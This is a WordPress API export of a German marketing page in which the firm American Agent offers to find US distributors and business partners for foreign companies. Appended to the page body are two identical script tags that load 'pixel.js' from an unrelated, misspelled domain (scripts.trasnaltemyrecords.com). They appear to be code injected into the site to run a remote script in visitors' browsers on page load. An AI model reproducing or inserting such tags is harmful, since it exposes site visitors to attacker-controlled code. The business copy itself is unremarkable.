{"id":3141,"date":"2014-08-16T07:17:06","date_gmt":"2014-08-16T07:17:06","guid":{"rendered":"https:\/\/americanagent.com\/usa-distributor-search-2\/"},"modified":"2014-09-17T12:00:59","modified_gmt":"2014-09-17T16:00:59","slug":"vertriebspartner-und-geschaeftspartner-finden","status":"publish","type":"page","link":"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/","title":{"rendered":"Vertriebspartner und Gesch\u00e4ftspartner suchen"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-e6aee21e35d547d621d4f7a667e340d0\">\n#top .av-special-heading.av-av_heading-e6aee21e35d547d621d4f7a667e340d0{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-e6aee21e35d547d621d4f7a667e340d0 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-e6aee21e35d547d621d4f7a667e340d0 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-e6aee21e35d547d621d4f7a667e340d0 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Wie man Vertriebspartner und Gesch\u00e4ftspartner findet<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-aaf3a53f7e22769a7798f31e42769683 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Viellecht sind Sie ein Betrieb mit einer komplexen und technischen Produktlinie oder Ihr Kundendienst ben\u00f6tigt einfach etwas mehr lokale Plazierung&#8230; Es gibt viele Gr\u00fcnde warum eine Partnerschaft mit einem amerikanischen Vertriebspartner, Handelsvertreter oder\u00a0Weiterverk\u00e4ufer notwendig ist.<\/p>\n<p>Die Firma American Agent ist in der idealen Lage Ihnen zu helfen. Wir k\u00f6nnen Sie auf dem besten Weg mit potenziellen amerikanischen Gesch\u00e4ftspartnern verkn\u00fcpfen. Seit 2002, haben wir \u00fcber 100 Unternehmen geholfen Ihren bestm\u00f6glichen Handelspartner zu finden. Wir verbinden Sie mit etablierten Firmen mit einem guten Ruf und Firmengeschichte, in Ihrer Gesch\u00e4ftsnische. Wir gehen sicher, dass das Unternehmen von Personen geleitet wird die Ihr Produkt und Ihren Absatzmarkt verstehen. Und das Wichtigste \u2013 wir suchen immer nach Unternehmen mit der effektivsten und st\u00e4rksten Kaufkraft.<\/p>\n<p>Wir k\u00f6nnen und wir werden:<\/p>\n<p>(1) Ihnen alle Unternehmen in Ihrer Branche vorlegen. Wir kennen bereits viele amerikanische Unternehmen sehr gut und k\u00f6nnen daher viele Firmen ohne gro\u00dfen Aufwand anzielen. Normalerweise Betr\u00e4gt die Auswahl an Unternehmen zwischen 50 \u2013 150, und das ist unser Startpunkt.<\/p>\n<p>(2) Sie den richtigen Gesch\u00e4ftspartnern innerhalb jeder Firma vorstellen. Meistens sind dies hohe F\u00fchrungskr\u00e4fte oder die Inhaber der Firma.<\/p>\n<p>(3) Ihnen freundlichen\u00a0und diplomatischen Rat geben und die Menge an Interesse von anderen Unternehmen absch\u00e4tzen.<\/p>\n<p>Ab diesem Zeitpunkt \u00e4ndert sich die Situation immer. Durch Er\u00f6ffnung dieser ersten Kommunikationsbasis k\u00f6nnen wir zusammen mit Ihnen die Marktplazierung Ihres Unternehmens und wer Ihre gr\u00f6\u00dften Interessenten sind, besser verstehen.<\/p>\n<p>Der n\u00e4chste Schritt ist Meetings mit den besten potenziellen Handelspartner zu arrangieren. Wir haben das bereits oft gemacht und k\u00f6nnen Ihnen Termine, angepasst an Ihren Reiseplan, organisieren.\u00a0Dies ist der beste Weg f\u00fcr Sie, zu erkennen welche Unternehmen sich am idealsten als m\u00f6gliche amerikanische Handelspartner eignen.<\/p>\n<p>Die L\u00e4nge des Projekts kann variieren, abh\u00e4ngig von Ihrer Situation. Kontaktieren Sie uns f\u00fcr mehr Details.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3141","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - Vertriebspartner und Gesch\u00e4ftspartner USA<\/title>\n<meta name=\"description\" content=\"American Agent hilft ihnen die besten Vertriebspartner und Gesch\u00e4ftspartner in den USA zu finden um Ihre Verkaufsvorstellungen zu erf\u00fcllen.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - Vertriebspartner und Gesch\u00e4ftspartner USA\" \/>\n<meta property=\"og:description\" content=\"American Agent hilft ihnen die besten Vertriebspartner und Gesch\u00e4ftspartner in den USA zu finden um Ihre Verkaufsvorstellungen zu erf\u00fcllen.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-17T16:00:59+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/vertriebspartner-und-geschaeftspartner-finden\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/vertriebspartner-und-geschaeftspartner-finden\\\/\",\"name\":\"American Agent - Vertriebspartner und Gesch\u00e4ftspartner USA\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:06+00:00\",\"dateModified\":\"2014-09-17T16:00:59+00:00\",\"description\":\"American Agent hilft ihnen die besten Vertriebspartner und Gesch\u00e4ftspartner in den USA zu finden um Ihre Verkaufsvorstellungen zu erf\u00fcllen.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/vertriebspartner-und-geschaeftspartner-finden\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/de\\\/vertriebspartner-und-geschaeftspartner-finden\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/vertriebspartner-und-geschaeftspartner-finden\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Vertriebspartner und Gesch\u00e4ftspartner suchen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - Vertriebspartner und Gesch\u00e4ftspartner USA","description":"American Agent hilft ihnen die besten Vertriebspartner und Gesch\u00e4ftspartner in den USA zu finden um Ihre Verkaufsvorstellungen zu erf\u00fcllen.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/","og_locale":"de_DE","og_type":"article","og_title":"American Agent - Vertriebspartner und Gesch\u00e4ftspartner USA","og_description":"American Agent hilft ihnen die besten Vertriebspartner und Gesch\u00e4ftspartner in den USA zu finden um Ihre Verkaufsvorstellungen zu erf\u00fcllen.","og_url":"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-17T16:00:59+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/","url":"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/","name":"American Agent - Vertriebspartner und Gesch\u00e4ftspartner USA","isPartOf":{"@id":"https:\/\/americanagent.com\/de\/#website"},"datePublished":"2014-08-16T07:17:06+00:00","dateModified":"2014-09-17T16:00:59+00:00","description":"American Agent hilft ihnen die besten Vertriebspartner und Gesch\u00e4ftspartner in den USA zu finden um Ihre Verkaufsvorstellungen zu erf\u00fcllen.","breadcrumb":{"@id":"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/de\/"},{"@type":"ListItem","position":2,"name":"Vertriebspartner und Gesch\u00e4ftspartner suchen"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/de\/#website","url":"https:\/\/americanagent.com\/de\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3141","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/comments?post=3141"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3141\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/media?parent=3141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}